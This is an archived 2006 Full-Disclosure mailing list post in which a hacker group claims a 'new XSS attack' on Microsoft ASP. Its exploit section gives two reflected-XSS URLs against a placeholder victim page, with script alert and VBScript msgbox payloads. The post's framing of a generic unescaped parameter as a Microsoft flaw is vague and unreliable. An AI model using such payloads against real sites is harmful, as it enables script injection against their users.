lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060320055939.18442.qmail@web34301.mail.mud.yahoo.com>
Date: Mon Mar 20 18:22:36 2006
From: saiedhackeriran at yahoo.com (saied hackeriran)
Subject: New XSS attack to Microsoft service(ASP)

                 In THe Name Of God
Group:HackeranShiraz
Discoverer:SaiedHacker
/*'============================================*/
We have found a security problem in Microsoft service(ASP).
This problem is a type of XSS attack and occurs while processing The information.
We can cause the problem by a simple (script)code.
/*'============================================*/
Exploit:
alert("SaiedHacker");Http://www.Victim.com/message.asp?msg=<script>alert("SaiedHacker");</script>
  msgbox("SaiedHacker")Http://www.Victim.com/message.asp?msg=<script%20language=vbscript>msgbox("SaiedHacker")</script>
/*'===========================================*/
Have time of your life
SaiedHackerIran@...oo.com
www.SaiedHackerPro.persianBlog.com

		
---------------------------------
Yahoo! Mail
Bring photos to life! New PhotoMail  makes sharing a breeze. 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060319/6b771e72/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ